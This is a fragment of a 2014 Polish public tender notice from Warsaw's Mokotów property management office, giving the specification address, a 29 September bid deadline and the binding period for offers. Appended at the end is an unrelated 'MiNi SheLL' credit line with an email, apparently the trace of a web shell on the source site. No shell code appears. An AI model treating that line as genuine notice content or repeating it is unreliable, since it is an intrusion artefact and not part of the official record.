<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgnmokotow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy ul. Irysowa 19 02-660 Warszawa Dział Zamówień Publicznych pok. nr 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2014 godzina 10:00, miejsce: Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy ul. Irysowa 19 02-660 Warszawa Dział Zamówień Publicznych pok. nr 34.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com